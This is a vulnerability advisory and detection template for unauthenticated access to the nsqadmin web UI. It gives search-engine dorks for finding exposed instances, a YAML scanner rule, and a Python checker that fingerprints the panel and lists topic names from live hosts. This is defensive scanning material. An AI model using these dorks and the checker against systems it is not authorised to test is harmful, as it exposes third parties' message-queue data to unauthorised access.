Vulnerability description
nsqadmin is the NSQ web UI that aggregates real-time statistics for a cluster and performs administrative tasks: it provides a single interface for managing topics and channels and displays live monitoring data. By default nsqadmin ships without any authentication, so anyone who can reach its HTTP port (4171 by default) can read cluster state and perform sensitive operations against the nodes (the UI exposes actions such as deleting, emptying and pausing topics and channels), which can lead to data leakage or data loss.
fofa: title="nsqadmin"
hunter: title:"nsqadmin"
id: nsq-admin-panel-unauth
info:
  name: nsqadmin unauthenticated access
  author: sulab
  severity: high
  verified: true
  description: |-
    nsqadmin is the NSQ web UI that aggregates real-time statistics for a cluster and performs administrative tasks: it provides a single interface for managing topics and channels and displays live monitoring data. By default nsqadmin has no authentication, so an attacker who can reach it can directly manipulate the cluster's nodes and perform sensitive operations, leading to data leakage or data loss.
    fofa: title="nsqadmin"
    hunter: title:"nsqadmin"
  solutions: "Do not expose nsqadmin to untrusted networks, or place it behind SSO / an authenticating reverse proxy"
  reference:
    - https://github.com/nsqio/nsq/issues/1103
    - https://nsq.io/components/nsqd.html
    - https://avd.aliyun.com/detail?id=AVD-2021-883498
  tags: nsq,nsqadmin,admin,unauth
  created: 2024/06/25
rules:
  r0:
    request:
      method: GET
      path: /
      follow_redirects: true
    expression: response.body.ibcontains(b'<title>nsqadmin</title>')
    extractors:
      - type: regex
        extractor:
          ext1: '"nsqadmin/(?P<nsqadmin>v[0-9]{1,2}\\.[0-9]{1,2}\\.[0-9]{1,2})".bsubmatch(response.raw)'
          nsqadmin: ext1["nsqadmin"]
  r1:
    request:
      method: GET
      path: /api/topics?inactive=true
    expression: response.body.bcontains(b'"message":""') && response.body.bcontains(b'"topics":')
expression: r0() && r1()
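The same two rules as a stand-alone Python check. This is an added example, not code from the original page, the template author or the nsq project: fingerprint_index implements r0 (case-insensitive title match plus the version extractor), check_topics_api implements r1 (an HTTP 200 JSON body carrying a "topics" list and an empty "message"), and evaluate combines them like the template's top-level r0() && r1(). The SAMPLE_* response bodies are constructed for an offline dry run, not captured from a real host, and the script-tag line that carries the version string is an assumed layout; check_target performs the live requests and should only be pointed at hosts you are authorised to test.

```python
import json
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Fingerprint used by the template above: the nsqadmin page title and the
# version string embedded in the page, e.g. "nsqadmin/v1.2.1".
TITLE_MARKER = b"<title>nsqadmin</title>"
VERSION_RE = re.compile(rb'"nsqadmin/(v[0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,2})"')

# Constructed sample responses for an offline dry run (not captured from a real host).
SAMPLE_INDEX = (
    b'<!DOCTYPE html><html><head><title>nsqadmin</title></head>'
    b'<body><script>var VERSION="nsqadmin/v1.2.1";</script></body></html>'  # assumed layout
)
SAMPLE_TOPICS = b'{"topics":["orders","audit_log"],"message":""}'
SAMPLE_DENIED = b'<html><head><title>401 Authorization Required</title></head></html>'


def fingerprint_index(body: bytes) -> dict:
    """Rule r0: is this the nsqadmin UI, and which version is visible (if any)?"""
    is_nsqadmin = TITLE_MARKER in body.lower()  # ibcontains = case-insensitive contains
    m = VERSION_RE.search(body)
    return {"is_nsqadmin": is_nsqadmin, "version": m.group(1).decode() if m else None}


def check_topics_api(status: int, body: bytes) -> dict:
    """Rule r1: /api/topics?inactive=true answered a topic list with no auth."""
    if status != 200:
        return {"unauth": False, "topics": []}
    try:
        data = json.loads(body)
    except ValueError:
        return {"unauth": False, "topics": []}
    # Mirror the template: both '"topics":' and '"message":""' must be present.
    if not isinstance(data, dict) or "topics" not in data or data.get("message") != "":
        return {"unauth": False, "topics": []}
    return {"unauth": True, "topics": list(data["topics"])}


def evaluate(index_body: bytes, api_status: int, api_body: bytes) -> dict:
    """Top-level expression r0() && r1(), plus the extracted version and topic names."""
    r0 = fingerprint_index(index_body)
    r1 = check_topics_api(api_status, api_body)
    return {
        "vulnerable": r0["is_nsqadmin"] and r1["unauth"],
        "version": r0["version"],
        "topics": r1["topics"],
    }


def _fetch(url: str, timeout: float = 10.0):
    """GET url, following redirects like the template's follow_redirects: true."""
    req = urllib.request.Request(url, headers={"User-Agent": "nsqadmin-unauth-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:  # non-2xx still carries a body worth inspecting
        return e.code, e.read()


def check_target(base_url: str) -> dict:
    """Live check, e.g. check_target("http://10.0.0.5:4171/") against an authorised host."""
    _, index_body = _fetch(urljoin(base_url, "/"))
    api_status, api_body = _fetch(urljoin(base_url, "/api/topics?inactive=true"))
    return evaluate(index_body, api_status, api_body)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(json.dumps(check_target(sys.argv[1]), indent=2))
    else:  # offline dry run on the constructed samples
        print(json.dumps(evaluate(SAMPLE_INDEX, 200, SAMPLE_TOPICS), indent=2))
```

Two practical caveats. A non-empty "message" (nsqadmin reports per-node errors there, for example when an nsqlookupd is unreachable) makes r1 fail even though the endpoint answered without authentication, so a negative result is not proof that the panel is protected; inspect the raw body in that case. And nsqadmin's own --admin-user / --acl-http-header options are not a login: they only restrict privileged actions to user names read from a request header (X-Forwarded-User by default), so they help only behind a reverse proxy that authenticates the client and overwrites that header itself, which is why the template's remediation is network isolation or SSO in front of the service.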